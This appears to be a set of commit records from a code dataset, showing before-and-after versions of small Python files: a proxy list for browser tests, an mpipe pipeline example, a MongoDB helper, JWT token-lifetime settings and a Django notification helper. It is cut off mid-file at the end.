* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.179.12.86:3128", # (Example) - set your own proxy here
"example2": "176.9.79.126:3128", # (Example) - set your own proxy here
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
Update the example proxy list | """
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.179.12.86:3128", # (Example) - set your own proxy here
"example2": "socks4://50.197.210.138:32100", # (Example)
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
| <commit_before>"""
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.179.12.86:3128", # (Example) - set your own proxy here
"example2": "176.9.79.126:3128", # (Example) - set your own proxy here
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
<commit_msg>Update the example proxy list<commit_after> | """
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.179.12.86:3128", # (Example) - set your own proxy here
"example2": "socks4://50.197.210.138:32100", # (Example)
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
| """
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.179.12.86:3128", # (Example) - set your own proxy here
"example2": "176.9.79.126:3128", # (Example) - set your own proxy here
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
Update the example proxy list"""
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.179.12.86:3128", # (Example) - set your own proxy here
"example2": "socks4://50.197.210.138:32100", # (Example)
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
| <commit_before>"""
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.179.12.86:3128", # (Example) - set your own proxy here
"example2": "176.9.79.126:3128", # (Example) - set your own proxy here
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
<commit_msg>Update the example proxy list<commit_after>"""
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.179.12.86:3128", # (Example) - set your own proxy here
"example2": "socks4://50.197.210.138:32100", # (Example)
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
|
d88c1221e2d07b300f29ef2605acea18c9e7fbf2 | test/tiny.py | test/tiny.py | from mpipe import OrderedStage, Pipeline
def increment(value):
return value + 1
def double(value):
return value * 2
stage1 = OrderedStage(increment, 3)
stage2 = OrderedStage(double, 3)
stage1.link(stage2)
pipe = Pipeline(stage1)
for number in range(10):
pipe.put(number)
pipe.put(None)
for result in pipe.results():
print(result)
| from mpipe import OrderedStage, Pipeline
def increment(value):
return value + 1
def double(value):
return value * 2
stage1 = OrderedStage(increment, 3)
stage2 = OrderedStage(double, 3)
pipe = Pipeline(stage1.link(stage2))
for number in range(10):
pipe.put(number)
pipe.put(None)
for result in pipe.results():
print(result)
| Use multi-link pipeline construction syntax. | Use multi-link pipeline construction syntax.
| Python | mit | vmlaker/mpipe | from mpipe import OrderedStage, Pipeline
def increment(value):
return value + 1
def double(value):
return value * 2
stage1 = OrderedStage(increment, 3)
stage2 = OrderedStage(double, 3)
stage1.link(stage2)
pipe = Pipeline(stage1)
for number in range(10):
pipe.put(number)
pipe.put(None)
for result in pipe.results():
print(result)
Use multi-link pipeline construction syntax. | from mpipe import OrderedStage, Pipeline
def increment(value):
return value + 1
def double(value):
return value * 2
stage1 = OrderedStage(increment, 3)
stage2 = OrderedStage(double, 3)
pipe = Pipeline(stage1.link(stage2))
for number in range(10):
pipe.put(number)
pipe.put(None)
for result in pipe.results():
print(result)
| <commit_before>from mpipe import OrderedStage, Pipeline
def increment(value):
return value + 1
def double(value):
return value * 2
stage1 = OrderedStage(increment, 3)
stage2 = OrderedStage(double, 3)
stage1.link(stage2)
pipe = Pipeline(stage1)
for number in range(10):
pipe.put(number)
pipe.put(None)
for result in pipe.results():
print(result)
<commit_msg>Use multi-link pipeline construction syntax.<commit_after> | from mpipe import OrderedStage, Pipeline
def increment(value):
return value + 1
def double(value):
return value * 2
stage1 = OrderedStage(increment, 3)
stage2 = OrderedStage(double, 3)
pipe = Pipeline(stage1.link(stage2))
for number in range(10):
pipe.put(number)
pipe.put(None)
for result in pipe.results():
print(result)
| from mpipe import OrderedStage, Pipeline
def increment(value):
return value + 1
def double(value):
return value * 2
stage1 = OrderedStage(increment, 3)
stage2 = OrderedStage(double, 3)
stage1.link(stage2)
pipe = Pipeline(stage1)
for number in range(10):
pipe.put(number)
pipe.put(None)
for result in pipe.results():
print(result)
Use multi-link pipeline construction syntax.from mpipe import OrderedStage, Pipeline
def increment(value):
return value + 1
def double(value):
return value * 2
stage1 = OrderedStage(increment, 3)
stage2 = OrderedStage(double, 3)
pipe = Pipeline(stage1.link(stage2))
for number in range(10):
pipe.put(number)
pipe.put(None)
for result in pipe.results():
print(result)
| <commit_before>from mpipe import OrderedStage, Pipeline
def increment(value):
return value + 1
def double(value):
return value * 2
stage1 = OrderedStage(increment, 3)
stage2 = OrderedStage(double, 3)
stage1.link(stage2)
pipe = Pipeline(stage1)
for number in range(10):
pipe.put(number)
pipe.put(None)
for result in pipe.results():
print(result)
<commit_msg>Use multi-link pipeline construction syntax.<commit_after>from mpipe import OrderedStage, Pipeline
def increment(value):
return value + 1
def double(value):
return value * 2
stage1 = OrderedStage(increment, 3)
stage2 = OrderedStage(double, 3)
pipe = Pipeline(stage1.link(stage2))
for number in range(10):
pipe.put(number)
pipe.put(None)
for result in pipe.results():
print(result)
|
11526af359a19446aa95a74833028329f8969107 | src/common/database.py | src/common/database.py | import pymongo
class Database:
URI = 'mongodb://127.0.0.1:27017'
DATABASE = None
@staticmethod
def initialize():
client = pymongo.MongoClient(Database.URI)
Database.DATABASE = client['fullstack']
@staticmethod
def insert(collection, data):
"""Insert data into a collection"""
Database.DATABASE[collection].insert(data)
@staticmethod
def find(collection, query):
"""Find multiple document(s) within a collection"""
return Database.DATABASE[collection].find(query)
@staticmethod
def find_one(collection, query):
"""Find one document withint a collection"""
return Database.DATABASE[collection].find_one(query) | Add common db static methods | Add common db static methods
| Python | apache-2.0 | asimonia/pricing-alerts,asimonia/pricing-alerts | Add common db static methods | import pymongo
class Database:
URI = 'mongodb://127.0.0.1:27017'
DATABASE = None
@staticmethod
def initialize():
client = pymongo.MongoClient(Database.URI)
Database.DATABASE = client['fullstack']
@staticmethod
def insert(collection, data):
"""Insert data into a collection"""
Database.DATABASE[collection].insert(data)
@staticmethod
def find(collection, query):
"""Find multiple document(s) within a collection"""
return Database.DATABASE[collection].find(query)
@staticmethod
def find_one(collection, query):
"""Find one document withint a collection"""
return Database.DATABASE[collection].find_one(query) | <commit_before><commit_msg>Add common db static methods<commit_after> | import pymongo
class Database:
URI = 'mongodb://127.0.0.1:27017'
DATABASE = None
@staticmethod
def initialize():
client = pymongo.MongoClient(Database.URI)
Database.DATABASE = client['fullstack']
@staticmethod
def insert(collection, data):
"""Insert data into a collection"""
Database.DATABASE[collection].insert(data)
@staticmethod
def find(collection, query):
"""Find multiple document(s) within a collection"""
return Database.DATABASE[collection].find(query)
@staticmethod
def find_one(collection, query):
"""Find one document withint a collection"""
return Database.DATABASE[collection].find_one(query) | Add common db static methodsimport pymongo
class Database:
URI = 'mongodb://127.0.0.1:27017'
DATABASE = None
@staticmethod
def initialize():
client = pymongo.MongoClient(Database.URI)
Database.DATABASE = client['fullstack']
@staticmethod
def insert(collection, data):
"""Insert data into a collection"""
Database.DATABASE[collection].insert(data)
@staticmethod
def find(collection, query):
"""Find multiple document(s) within a collection"""
return Database.DATABASE[collection].find(query)
@staticmethod
def find_one(collection, query):
"""Find one document withint a collection"""
return Database.DATABASE[collection].find_one(query) | <commit_before><commit_msg>Add common db static methods<commit_after>import pymongo
class Database:
URI = 'mongodb://127.0.0.1:27017'
DATABASE = None
@staticmethod
def initialize():
client = pymongo.MongoClient(Database.URI)
Database.DATABASE = client['fullstack']
@staticmethod
def insert(collection, data):
"""Insert data into a collection"""
Database.DATABASE[collection].insert(data)
@staticmethod
def find(collection, query):
"""Find multiple document(s) within a collection"""
return Database.DATABASE[collection].find(query)
@staticmethod
def find_one(collection, query):
"""Find one document withint a collection"""
return Database.DATABASE[collection].find_one(query) | |
5864b503bced36d51ab911d5b306284dbc0cdb13 | rest_framework_simplejwt/settings.py | rest_framework_simplejwt/settings.py | from __future__ import unicode_literals
from datetime import timedelta
from django.conf import settings
from rest_framework.settings import APISettings
USER_SETTINGS = getattr(settings, 'SIMPLE_JWT', None)
DEFAULTS = {
'AUTH_HEADER_TYPE': 'Bearer',
'USER_ID_FIELD': 'id',
'USER_ID_CLAIM': 'user_id',
'TOKEN_TYPE_CLAIM': 'token_type',
'SLIDING_REFRESH_EXP_CLAIM': 'refresh_exp',
'SLIDING_TOKEN_LIFETIME': timedelta(days=1),
'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(days=3),
'ACCESS_TOKEN_LIFETIME': timedelta(minutes=5),
'REFRESH_TOKEN_LIFETIME': timedelta(days=1),
'SECRET_KEY': settings.SECRET_KEY,
# Undocumented settings. Changing these may lead to unexpected behavior.
# Make sure you know what you're doing. These might become part of the
# public API eventually but that would require some adjustments.
'AUTH_TOKEN_CLASS': 'rest_framework_simplejwt.tokens.AccessToken',
'TOKEN_BACKEND_CLASS': 'rest_framework_simplejwt.backends.PythonJOSEBackend',
'ALGORITHM': 'HS256',
}
IMPORT_STRING_SETTINGS = (
'AUTH_TOKEN_CLASS',
'TOKEN_BACKEND_CLASS',
)
api_settings = APISettings(USER_SETTINGS, DEFAULTS, IMPORT_STRING_SETTINGS)
| from __future__ import unicode_literals
from datetime import timedelta
from django.conf import settings
from rest_framework.settings import APISettings
USER_SETTINGS = getattr(settings, 'SIMPLE_JWT', None)
DEFAULTS = {
'AUTH_HEADER_TYPE': 'Bearer',
'USER_ID_FIELD': 'id',
'USER_ID_CLAIM': 'user_id',
'TOKEN_TYPE_CLAIM': 'token_type',
'SLIDING_REFRESH_EXP_CLAIM': 'refresh_exp',
'SLIDING_TOKEN_LIFETIME': timedelta(minutes=5),
'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(days=1),
'ACCESS_TOKEN_LIFETIME': timedelta(minutes=5),
'REFRESH_TOKEN_LIFETIME': timedelta(days=1),
'SECRET_KEY': settings.SECRET_KEY,
# Undocumented settings. Changing these may lead to unexpected behavior.
# Make sure you know what you're doing. These might become part of the
# public API eventually but that would require some adjustments.
'AUTH_TOKEN_CLASS': 'rest_framework_simplejwt.tokens.AccessToken',
'TOKEN_BACKEND_CLASS': 'rest_framework_simplejwt.backends.PythonJOSEBackend',
'ALGORITHM': 'HS256',
}
IMPORT_STRING_SETTINGS = (
'AUTH_TOKEN_CLASS',
'TOKEN_BACKEND_CLASS',
)
api_settings = APISettings(USER_SETTINGS, DEFAULTS, IMPORT_STRING_SETTINGS)
| Make sliding token lifetime defaults a bit more conservative | Make sliding token lifetime defaults a bit more conservative
| Python | mit | davesque/django-rest-framework-simplejwt,davesque/django-rest-framework-simplejwt | from __future__ import unicode_literals
from datetime import timedelta
from django.conf import settings
from rest_framework.settings import APISettings
USER_SETTINGS = getattr(settings, 'SIMPLE_JWT', None)
DEFAULTS = {
'AUTH_HEADER_TYPE': 'Bearer',
'USER_ID_FIELD': 'id',
'USER_ID_CLAIM': 'user_id',
'TOKEN_TYPE_CLAIM': 'token_type',
'SLIDING_REFRESH_EXP_CLAIM': 'refresh_exp',
'SLIDING_TOKEN_LIFETIME': timedelta(days=1),
'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(days=3),
'ACCESS_TOKEN_LIFETIME': timedelta(minutes=5),
'REFRESH_TOKEN_LIFETIME': timedelta(days=1),
'SECRET_KEY': settings.SECRET_KEY,
# Undocumented settings. Changing these may lead to unexpected behavior.
# Make sure you know what you're doing. These might become part of the
# public API eventually but that would require some adjustments.
'AUTH_TOKEN_CLASS': 'rest_framework_simplejwt.tokens.AccessToken',
'TOKEN_BACKEND_CLASS': 'rest_framework_simplejwt.backends.PythonJOSEBackend',
'ALGORITHM': 'HS256',
}
IMPORT_STRING_SETTINGS = (
'AUTH_TOKEN_CLASS',
'TOKEN_BACKEND_CLASS',
)
api_settings = APISettings(USER_SETTINGS, DEFAULTS, IMPORT_STRING_SETTINGS)
Make sliding token lifetime defaults a bit more conservative | from __future__ import unicode_literals
from datetime import timedelta
from django.conf import settings
from rest_framework.settings import APISettings
USER_SETTINGS = getattr(settings, 'SIMPLE_JWT', None)
DEFAULTS = {
'AUTH_HEADER_TYPE': 'Bearer',
'USER_ID_FIELD': 'id',
'USER_ID_CLAIM': 'user_id',
'TOKEN_TYPE_CLAIM': 'token_type',
'SLIDING_REFRESH_EXP_CLAIM': 'refresh_exp',
'SLIDING_TOKEN_LIFETIME': timedelta(minutes=5),
'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(days=1),
'ACCESS_TOKEN_LIFETIME': timedelta(minutes=5),
'REFRESH_TOKEN_LIFETIME': timedelta(days=1),
'SECRET_KEY': settings.SECRET_KEY,
# Undocumented settings. Changing these may lead to unexpected behavior.
# Make sure you know what you're doing. These might become part of the
# public API eventually but that would require some adjustments.
'AUTH_TOKEN_CLASS': 'rest_framework_simplejwt.tokens.AccessToken',
'TOKEN_BACKEND_CLASS': 'rest_framework_simplejwt.backends.PythonJOSEBackend',
'ALGORITHM': 'HS256',
}
IMPORT_STRING_SETTINGS = (
'AUTH_TOKEN_CLASS',
'TOKEN_BACKEND_CLASS',
)
api_settings = APISettings(USER_SETTINGS, DEFAULTS, IMPORT_STRING_SETTINGS)
| <commit_before>from __future__ import unicode_literals
from datetime import timedelta
from django.conf import settings
from rest_framework.settings import APISettings
USER_SETTINGS = getattr(settings, 'SIMPLE_JWT', None)
DEFAULTS = {
'AUTH_HEADER_TYPE': 'Bearer',
'USER_ID_FIELD': 'id',
'USER_ID_CLAIM': 'user_id',
'TOKEN_TYPE_CLAIM': 'token_type',
'SLIDING_REFRESH_EXP_CLAIM': 'refresh_exp',
'SLIDING_TOKEN_LIFETIME': timedelta(days=1),
'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(days=3),
'ACCESS_TOKEN_LIFETIME': timedelta(minutes=5),
'REFRESH_TOKEN_LIFETIME': timedelta(days=1),
'SECRET_KEY': settings.SECRET_KEY,
# Undocumented settings. Changing these may lead to unexpected behavior.
# Make sure you know what you're doing. These might become part of the
# public API eventually but that would require some adjustments.
'AUTH_TOKEN_CLASS': 'rest_framework_simplejwt.tokens.AccessToken',
'TOKEN_BACKEND_CLASS': 'rest_framework_simplejwt.backends.PythonJOSEBackend',
'ALGORITHM': 'HS256',
}
IMPORT_STRING_SETTINGS = (
'AUTH_TOKEN_CLASS',
'TOKEN_BACKEND_CLASS',
)
api_settings = APISettings(USER_SETTINGS, DEFAULTS, IMPORT_STRING_SETTINGS)
<commit_msg>Make sliding token lifetime defaults a bit more conservative<commit_after> | from __future__ import unicode_literals
from datetime import timedelta
from django.conf import settings
from rest_framework.settings import APISettings
USER_SETTINGS = getattr(settings, 'SIMPLE_JWT', None)
DEFAULTS = {
'AUTH_HEADER_TYPE': 'Bearer',
'USER_ID_FIELD': 'id',
'USER_ID_CLAIM': 'user_id',
'TOKEN_TYPE_CLAIM': 'token_type',
'SLIDING_REFRESH_EXP_CLAIM': 'refresh_exp',
'SLIDING_TOKEN_LIFETIME': timedelta(minutes=5),
'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(days=1),
'ACCESS_TOKEN_LIFETIME': timedelta(minutes=5),
'REFRESH_TOKEN_LIFETIME': timedelta(days=1),
'SECRET_KEY': settings.SECRET_KEY,
# Undocumented settings. Changing these may lead to unexpected behavior.
# Make sure you know what you're doing. These might become part of the
# public API eventually but that would require some adjustments.
'AUTH_TOKEN_CLASS': 'rest_framework_simplejwt.tokens.AccessToken',
'TOKEN_BACKEND_CLASS': 'rest_framework_simplejwt.backends.PythonJOSEBackend',
'ALGORITHM': 'HS256',
}
IMPORT_STRING_SETTINGS = (
'AUTH_TOKEN_CLASS',
'TOKEN_BACKEND_CLASS',
)
api_settings = APISettings(USER_SETTINGS, DEFAULTS, IMPORT_STRING_SETTINGS)
| from __future__ import unicode_literals
from datetime import timedelta
from django.conf import settings
from rest_framework.settings import APISettings
USER_SETTINGS = getattr(settings, 'SIMPLE_JWT', None)
DEFAULTS = {
'AUTH_HEADER_TYPE': 'Bearer',
'USER_ID_FIELD': 'id',
'USER_ID_CLAIM': 'user_id',
'TOKEN_TYPE_CLAIM': 'token_type',
'SLIDING_REFRESH_EXP_CLAIM': 'refresh_exp',
'SLIDING_TOKEN_LIFETIME': timedelta(days=1),
'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(days=3),
'ACCESS_TOKEN_LIFETIME': timedelta(minutes=5),
'REFRESH_TOKEN_LIFETIME': timedelta(days=1),
'SECRET_KEY': settings.SECRET_KEY,
# Undocumented settings. Changing these may lead to unexpected behavior.
# Make sure you know what you're doing. These might become part of the
# public API eventually but that would require some adjustments.
'AUTH_TOKEN_CLASS': 'rest_framework_simplejwt.tokens.AccessToken',
'TOKEN_BACKEND_CLASS': 'rest_framework_simplejwt.backends.PythonJOSEBackend',
'ALGORITHM': 'HS256',
}
IMPORT_STRING_SETTINGS = (
'AUTH_TOKEN_CLASS',
'TOKEN_BACKEND_CLASS',
)
api_settings = APISettings(USER_SETTINGS, DEFAULTS, IMPORT_STRING_SETTINGS)
Make sliding token lifetime defaults a bit more conservativefrom __future__ import unicode_literals
from datetime import timedelta
from django.conf import settings
from rest_framework.settings import APISettings
USER_SETTINGS = getattr(settings, 'SIMPLE_JWT', None)
DEFAULTS = {
'AUTH_HEADER_TYPE': 'Bearer',
'USER_ID_FIELD': 'id',
'USER_ID_CLAIM': 'user_id',
'TOKEN_TYPE_CLAIM': 'token_type',
'SLIDING_REFRESH_EXP_CLAIM': 'refresh_exp',
'SLIDING_TOKEN_LIFETIME': timedelta(minutes=5),
'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(days=1),
'ACCESS_TOKEN_LIFETIME': timedelta(minutes=5),
'REFRESH_TOKEN_LIFETIME': timedelta(days=1),
'SECRET_KEY': settings.SECRET_KEY,
# Undocumented settings. Changing these may lead to unexpected behavior.
# Make sure you know what you're doing. These might become part of the
# public API eventually but that would require some adjustments.
'AUTH_TOKEN_CLASS': 'rest_framework_simplejwt.tokens.AccessToken',
'TOKEN_BACKEND_CLASS': 'rest_framework_simplejwt.backends.PythonJOSEBackend',
'ALGORITHM': 'HS256',
}
IMPORT_STRING_SETTINGS = (
'AUTH_TOKEN_CLASS',
'TOKEN_BACKEND_CLASS',
)
api_settings = APISettings(USER_SETTINGS, DEFAULTS, IMPORT_STRING_SETTINGS)
| <commit_before>from __future__ import unicode_literals
from datetime import timedelta
from django.conf import settings
from rest_framework.settings import APISettings
USER_SETTINGS = getattr(settings, 'SIMPLE_JWT', None)
DEFAULTS = {
'AUTH_HEADER_TYPE': 'Bearer',
'USER_ID_FIELD': 'id',
'USER_ID_CLAIM': 'user_id',
'TOKEN_TYPE_CLAIM': 'token_type',
'SLIDING_REFRESH_EXP_CLAIM': 'refresh_exp',
'SLIDING_TOKEN_LIFETIME': timedelta(days=1),
'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(days=3),
'ACCESS_TOKEN_LIFETIME': timedelta(minutes=5),
'REFRESH_TOKEN_LIFETIME': timedelta(days=1),
'SECRET_KEY': settings.SECRET_KEY,
# Undocumented settings. Changing these may lead to unexpected behavior.
# Make sure you know what you're doing. These might become part of the
# public API eventually but that would require some adjustments.
'AUTH_TOKEN_CLASS': 'rest_framework_simplejwt.tokens.AccessToken',
'TOKEN_BACKEND_CLASS': 'rest_framework_simplejwt.backends.PythonJOSEBackend',
'ALGORITHM': 'HS256',
}
IMPORT_STRING_SETTINGS = (
'AUTH_TOKEN_CLASS',
'TOKEN_BACKEND_CLASS',
)
api_settings = APISettings(USER_SETTINGS, DEFAULTS, IMPORT_STRING_SETTINGS)
<commit_msg>Make sliding token lifetime defaults a bit more conservative<commit_after>from __future__ import unicode_literals
from datetime import timedelta
from django.conf import settings
from rest_framework.settings import APISettings
USER_SETTINGS = getattr(settings, 'SIMPLE_JWT', None)
DEFAULTS = {
'AUTH_HEADER_TYPE': 'Bearer',
'USER_ID_FIELD': 'id',
'USER_ID_CLAIM': 'user_id',
'TOKEN_TYPE_CLAIM': 'token_type',
'SLIDING_REFRESH_EXP_CLAIM': 'refresh_exp',
'SLIDING_TOKEN_LIFETIME': timedelta(minutes=5),
'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(days=1),
'ACCESS_TOKEN_LIFETIME': timedelta(minutes=5),
'REFRESH_TOKEN_LIFETIME': timedelta(days=1),
'SECRET_KEY': settings.SECRET_KEY,
# Undocumented settings. Changing these may lead to unexpected behavior.
# Make sure you know what you're doing. These might become part of the
# public API eventually but that would require some adjustments.
'AUTH_TOKEN_CLASS': 'rest_framework_simplejwt.tokens.AccessToken',
'TOKEN_BACKEND_CLASS': 'rest_framework_simplejwt.backends.PythonJOSEBackend',
'ALGORITHM': 'HS256',
}
IMPORT_STRING_SETTINGS = (
'AUTH_TOKEN_CLASS',
'TOKEN_BACKEND_CLASS',
)
api_settings = APISettings(USER_SETTINGS, DEFAULTS, IMPORT_STRING_SETTINGS)
|
1c9f3b95cca8439ec8c4a5a5cb1959e8b2edaff2 | osmaxx-py/excerptconverter/converter_helper.py | osmaxx-py/excerptconverter/converter_helper.py | from django.contrib import messages
from django.core.mail import send_mail
from django.utils.translation import ugettext_lazy as _
import stored_messages
from osmaxx.excerptexport import models
class ConverterHelper:
def __init__(self, extraction_order):
self.extraction_order = extraction_order
self.user = extraction_order.orderer
def file_conversion_finished(self):
if self.extraction_order.output_files.count() >= len(self.extraction_order.extraction_formats):
self.inform_user(
messages.SUCCESS,
_('The extraction of the order "%(order_id)s" has been finished.') % {
'order_id': self.extraction_order.id
},
email=True
)
self.extraction_order.state = models.ExtractionOrderState.FINISHED
self.extraction_order.save()
def inform_user(self, message_type, message_text, email=True):
stored_messages.api.add_message_for(
users=[self.user],
level=message_type,
message_text=message_text
)
if email:
if hasattr(self.user, 'email'):
send_mail(
'[OSMAXX] '+message_text,
message_text,
'no-reply@osmaxx.hsr.ch',
[self.user.email]
)
else:
self.inform_user(
messages.WARNING,
_("There is no email address assigned to your account. "
"You won't be notified by email on process finish!"),
email=False
)
| from django.contrib import messages
from django.core.mail import send_mail
from django.utils.translation import ugettext_lazy as _
import stored_messages
from osmaxx.excerptexport import models
# functions using database (extraction_order) must be instance methods of a class
# -> free functions will not work: database connection error
class ConverterHelper:
def __init__(self, extraction_order):
self.extraction_order = extraction_order
self.user = extraction_order.orderer
def file_conversion_finished(self):
if self.extraction_order.output_files.count() >= len(self.extraction_order.extraction_formats):
self.inform_user(
messages.SUCCESS,
_('The extraction of the order "%(order_id)s" has been finished.') % {
'order_id': self.extraction_order.id
},
email=True
)
self.extraction_order.state = models.ExtractionOrderState.FINISHED
self.extraction_order.save()
def inform_user(self, message_type, message_text, email=True):
stored_messages.api.add_message_for(
users=[self.user],
level=message_type,
message_text=message_text
)
if email:
if hasattr(self.user, 'email'):
send_mail(
'[OSMAXX] '+message_text,
message_text,
'no-reply@osmaxx.hsr.ch',
[self.user.email]
)
else:
self.inform_user(
messages.WARNING,
_("There is no email address assigned to your account. "
"You won't be notified by email on process finish!"),
email=False
)
| Document reason for class instead of free function | Document reason for class instead of free function
| Python | isc | geometalab/drf-utm-zone-info,geometalab/drf-utm-zone-info,geometalab/osmaxx-frontend,geometalab/osmaxx-frontend,geometalab/osmaxx,geometalab/osmaxx,geometalab/osmaxx-frontend,geometalab/osmaxx,geometalab/osmaxx-frontend,geometalab/osmaxx | from django.contrib import messages
from django.core.mail import send_mail
from django.utils.translation import ugettext_lazy as _
import stored_messages
from osmaxx.excerptexport import models
class ConverterHelper:
def __init__(self, extraction_order):
self.extraction_order = extraction_order
self.user = extraction_order.orderer
def file_conversion_finished(self):
if self.extraction_order.output_files.count() >= len(self.extraction_order.extraction_formats):
self.inform_user(
messages.SUCCESS,
_('The extraction of the order "%(order_id)s" has been finished.') % {
'order_id': self.extraction_order.id
},
email=True
)
self.extraction_order.state = models.ExtractionOrderState.FINISHED
self.extraction_order.save()
def inform_user(self, message_type, message_text, email=True):
stored_messages.api.add_message_for(
users=[self.user],
level=message_type,
message_text=message_text
)
if email:
if hasattr(self.user, 'email'):
send_mail(
'[OSMAXX] '+message_text,
message_text,
'no-reply@osmaxx.hsr.ch',
[self.user.email]
)
else:
self.inform_user(
messages.WARNING,
_("There is no email address assigned to your account. "
"You won't be notified by email on process finish!"),
email=False
)
Document reason for class instead of free function | from django.contrib import messages
from django.core.mail import send_mail
from django.utils.translation import ugettext_lazy as _
import stored_messages
from osmaxx.excerptexport import models
# functions using database (extraction_order) must be instance methods of a class
# -> free functions will not work: database connection error
class ConverterHelper:
def __init__(self, extraction_order):
self.extraction_order = extraction_order
self.user = extraction_order.orderer
def file_conversion_finished(self):
if self.extraction_order.output_files.count() >= len(self.extraction_order.extraction_formats):
self.inform_user(
messages.SUCCESS,
